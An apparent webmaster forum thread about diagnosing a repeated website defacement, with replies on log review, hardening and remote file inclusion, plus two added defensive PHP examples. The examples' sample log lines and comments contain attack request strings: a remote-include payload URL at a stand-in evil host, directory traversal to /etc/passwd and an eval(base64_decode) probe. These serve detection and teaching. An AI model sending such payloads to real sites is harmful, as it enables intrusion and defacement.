  1. #1

    My web has been hacked, help me identify the culprit

    Hello,

    My website has been hacked several times in the past 3 days. The hacker, thank god, doesn't seem to be the destructive type for the time being (touch wood) but always deletes the main index file and instead posts a message of his own.

    How can I identify the IP (though I'm guessing it must change every night, possibly using a hacked remote PC, for the little I know about hackers), so I can enter that IP into the IP deny manager? It goes without saying that I've changed logins and passwords to long alphanumeric combinations. I've also checked the logs but I'm not sure what I'm looking for. In any case I can't find anything that stands out; certainly I ran a check to see if someone had deleted the index file but couldn't find anything in the logs.

    Is there any way to:

    1/ identify exactly the IP of the person who keeps hacking my web

    2/ know exactly how he is making these changes and gaining access to my index file?

    I've tried to ask my hosting company for help but they haven't been very helpful, to be honest, so despite my inexperience dealing with hackers I'm afraid it's up to me, and hopefully your kind contribution, to close the door to this annoying hacker.

  2. #2
    Hello,

    It seems index replacement is happening here. Some tips to prevent this:

    >> Secure tmp
    >> Scan the entire server using Linux Malware Detect
    >> Disable shell access for all users.
    >> Install ModSecurity.
    >> Install CSF
    >> Update all outdated software.
    >> Keep the ownership of directories to 755 and files to 644 (use suPHP)

  3. #3
    I think you should ask them specifics, such as who has been accessing my server, FTP activity, etc. And chances are, if they don't answer you, then they typically aren't a good company.

  4. #4

    Quote Originally Posted by Wolf95 View Post
    I think you should ask them specifics, such as who has been accessing my server, FTP activity, etc. And chances are, if they don't answer you, then they typically aren't a good company.
    How will a hosting company give you an FTP activity report when there are nearly 1500+ accounts on a server? Also, it seems the person got SQL injected, so it is related to script security and chmod permission setup issues only.

  5. #5
    Check the log files for a possible attacker's IP address by looking at its activity. Then you can find the location by checking InterNIC. Some countries also have a cyber crime unit that might help you out.

  6. #6
    Sounds like a defacement.

    You do need to examine your log files - both the FTP logs and the access logs.

    In the FTP logs look for uploads during the time frame this happened. In the access logs look for GETs or POSTs during this time with long query strings. They might include base64_decode, or a long string of ../../

    See what file they're targeting by looking through the log files and see what you can do to block that activity. Typically a good .htaccess file will protect your website from these types of attacks.

    Also, scan all files for a string: base64_decode as this might be a backdoor that they'll use to re-infect your website.
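    The log hunt described above, as an added PHP example that is not code from this thread or from any poster: it parses combined-format access log lines, flags the long query strings, base64_decode, ../../ and remote-URL patterns the post mentions, groups the hits by source IP (the address to feed into a deny list), and lists PHP files under a directory that contain base64_decode. The log lines are constructed for the demo; the directory to scan and the 200-character query-string threshold are assumptions.

```php
<?php
// Added example, not from the thread: flag suspicious requests in a combined-format
// access log and list files containing base64_decode. Sample log lines are constructed.

declare(strict_types=1);

// Parse one combined-log line into its fields, or return null if it does not match.
function parse_access_line(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'target' => $m[4], 'status' => (int)$m[5]];
}

// Return the reasons a request looks like an attack probe; empty array if it looks clean.
function suspicious_reasons(array $req): array
{
    $reasons = [];
    $decoded = rawurldecode($req['target']);                 // payloads are often percent-encoded
    $query   = (string)(parse_url($req['target'], PHP_URL_QUERY) ?? '');

    if (strlen($query) > 200) {                              // assumed threshold; tune per site
        $reasons[] = 'unusually long query string';
    }
    if (stripos($decoded, 'base64_decode') !== false) {
        $reasons[] = 'base64_decode in request';
    }
    if (preg_match('#(\.\./){2,}#', $decoded)) {
        $reasons[] = 'directory traversal (../../)';
    }
    if (preg_match('#=\s*(https?|ftp)://#i', $decoded)) {
        $reasons[] = 'remote URL passed as a parameter (RFI attempt)';
    }
    return $reasons;
}

// Scan the log, grouping findings by source IP so the offending address can be blocked.
function scan_access_log(array $lines): array
{
    $byIp = [];
    foreach ($lines as $line) {
        $req = parse_access_line($line);
        if ($req === null) {
            continue;
        }
        $reasons = suspicious_reasons($req);
        if ($reasons === []) {
            continue;
        }
        $byIp[$req['ip']][] = sprintf('%s %s %s (%d): %s',
            $req['time'], $req['method'], $req['target'], $req['status'], implode(', ', $reasons));
    }
    return $byIp;
}

// Recursively list PHP files under $dir whose contents mention base64_decode (a common
// backdoor marker; legitimate code uses it too, so every hit needs a manual look).
function find_base64_decode_files(string $dir): array
{
    $hits = [];
    $it = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $file) {
        if (!$file->isFile() || !preg_match('/\.(php|phtml|inc)$/i', $file->getFilename())) {
            continue;
        }
        $contents = file_get_contents($file->getPathname());
        if ($contents !== false && stripos($contents, 'base64_decode') !== false) {
            $hits[] = $file->getPathname();
        }
    }
    return $hits;
}

// --- Demo on constructed sample lines (RFC 5737 documentation addresses) ---
$sampleLog = [
    '203.0.113.7 - - [10/Jun/2011:02:14:03 +0000] "GET /index.php?page=home HTTP/1.1" 200 5123',
    '198.51.100.9 - - [10/Jun/2011:02:15:41 +0000] "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1" 200 812',
    '198.51.100.9 - - [10/Jun/2011:02:15:58 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1742',
    '198.51.100.9 - - [10/Jun/2011:02:16:20 +0000] "POST /images/x.php?c=eval(base64_decode(%27cGhwaW5mbygpOw%3D%3D%27)) HTTP/1.1" 200 33',
];

foreach (scan_access_log($sampleLog) as $ip => $findings) {
    echo "Suspicious requests from $ip:\n";
    foreach ($findings as $f) {
        echo "  $f\n";
    }
}

// Point this at the web root (assumed); here it scans the directory the script lives in.
foreach (find_base64_decode_files(__DIR__) as $path) {
    echo "base64_decode found in: $path\n";
}
```

    Run it with the PHP CLI against the raw access log (read the file into an array with file()) rather than against a web server. The file scan only catches this one marker, so a clean scan does not mean the account is clean, and a hit in a vendor library is not by itself proof of a backdoor.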

  7. #7
    Check /var/log/secure for any possible break-in via ssh.
    Regards,
    Tom.


  8. #8
    Hi,
    First of all, there are several steps you should take.

    1. Create a full backup of your account and download it to your local PC.
    2. Scan the backup file with an antivirus on your PC, so you can make sure there are no known trojan files on the account.
    3. Change all of your passwords, including FTP / SQL / EMAIL.
    4. Upgrade your website's software (if using Joomla / WordPress or any kind of free site software).
    5. Once you are satisfied with the upgrades and changes, create another full backup, and download it to your PC.
    6. Contact your host, and ask for logs for your account; they should be able to gather logs related to your account with ease.
    7. Go to www.whatismyip.org and look at how your IP looks (the first two numbers should be taken into consideration).

    Compare your IP with the IP addresses in the log; if you see an IP from a different "family", that might be your abuser.

    For example, if your IP is
    192.168.1.1
    and you can see in the logs
    10.200.1.1

    you can tell by that that a person from another ISP has logged into your account.
    Send that IP back to your hosting provider, ask them to check it and even block it in the firewall rules.

    These are only basic guidelines; there are many more things you can do in order to protect yourself.

  9. #9
    PC-based anti-virus programs are only going to find less than half of website-based malscripts.

    And I believe the logs beastserv is referring to are the FTP logs and the logs for SSH, but you also need to review the access logs, which won't have many, if any, entries from your local IP address.

  10. #10

    Quote Originally Posted by WeWatch View Post
    PC based anti-virus programs are only going to find less than half of website based malscripts.
    less is more.

  11. #11
    Using a PC-based anti-virus is better than nothing, but when cleaning a website, anything less than 100% is zero. If you don't get it all, it will just get re-infected again.

    If you don't find out how they got in the first time and close it, they will get back in and re-infect.

  12. #12
    Quote Originally Posted by WeWatch View Post
    Using a PC-based anti-virus is better than nothing, but when cleaning a website, anything less than 100% is zero. If you don't get it all, it will just get re-infected again.

    If you don't find out how they got in the first time and close it, they will get back in and re-infect.
    Yep, it's not the best thing, but it's better than nothing.
    If the file is not *that* large, VirusTotal could be helpful in some cases.

    These are only basic guidelines of good practice; much more can be done in order to resolve such matters.

    Also, this is only in the case of an infection which leads to a backdoor. In some cases the backdoor is the website code itself, hence the need for an upgrade to the latest versions of all modules / plugins related to the website, and close examination of the system logs, access logs and even error logs.

    But step one: change all related passwords. Once your account is breached, the main assumption is that your account is infected and all your passwords are compromised.

    It's always a good thing to be extra paranoid; if possible change even the username (which will change paths), and change the database names.

  13. #13
    Quote Originally Posted by beastserv View Post
    it's always a good thing to be extra paranoid,
    We definitely agree here.

  14. #14
    Is there a chance any of your scripts could have an RFI vulnerability?

    IE: Pages that load like index.php?page=home - index.php?page=about

    The about link would then include "about.php" from a different directory, or something?

    This can very easily be exploited by hackers to upload a shell and deface your site.
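    The include pattern Zixt describes, shown as an added PHP example that is not code from the thread or from the poster's site: the vulnerable form in the leading comment, and a replacement that resolves the page parameter against a fixed allowlist and then checks that the real path stays inside the pages directory. The pages directory, the page names and the 404 handling are assumptions.

```php
<?php
// Added example, not code from the thread or from the poster's site.
//
// Vulnerable pattern (what "index.php?page=about" usually looks like underneath):
//
//     include $_GET['page'] . '.php';
//
// With allow_url_include=On, ?page=http://evil.example/shell.txt? fetches and runs
// remote code (the trailing "?" turns the appended ".php" into a query string);
// even with it Off, ?page=../../../../tmp/uploaded_shell pulls in a local file
// the attacker managed to drop anywhere on the box. Hardened version follows.

declare(strict_types=1);

// Hypothetical pages directory and page list; adjust to the site's layout.
const PAGES_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = ['home', 'about', 'contact'];

// Return the absolute file to include for $page, or null if the request is not acceptable.
function resolve_page(string $page): ?string
{
    // 1. Only names from the allowlist are acceptable; "../x", "http://..." and
    //    anything else not on the list are rejected before touching the filesystem.
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }

    // 2. Defence in depth: even an allowlisted name must map to an existing file
    //    whose canonical path lies inside PAGES_DIR (realpath resolves symlinks and ..).
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $page . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$page = $_GET['page'] ?? 'home';
$file = resolve_page((string)$page);
if ($file === null) {
    http_response_code(404);
    exit('Page not found');
}
include $file;
```

    Independently of the code, keep allow_url_include = Off in php.ini (the default) so include() cannot load remote URLs at all, and treat every other script that builds a path or a query from request parameters the same way: compare against a fixed list, never concatenate user input into the include.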

  15. #15
    First of all many thanks for your kind contributions, and apologies for the delayed update.

    Things didn't end well. The hacker did indeed destroy a huge DB I had of which, and I don't have any excuse, I didn't have a backup. As I see it I got what I deserved for my lack of caution. On top of that I had hired a programmer who coded the faulty DB, and apparently that's where the hacker got in, exploiting a vulnerability. I hired a new one, obviously, and redesigned the website, but I lost all my previous DB work and positioning. It was a tough blow, but one from which I hope I learnt something valuable for the future.

    The hosting wasn't particularly helpful, IMO, but not the one to blame in this situation. Apparently when the hacker gets through a DB or PHP or one of your scripts it's extremely difficult for the hosting company to guess exactly which one, and I do get that now.

    Anyway, MEA CULPA.

    Quote Originally Posted by Zixt View Post
    Is there a chance any of your scripts could have an RFI vulnerability?

    IE: Pages that load like index.php?page=home - index.php?page=about

    The about link would then include "about.php" from a different directory, or something?

    This can very easily be exploited by hackers to upload a shell and deface your site.

    More or less this was the cause.

    Thanks anyway, guys and gals.
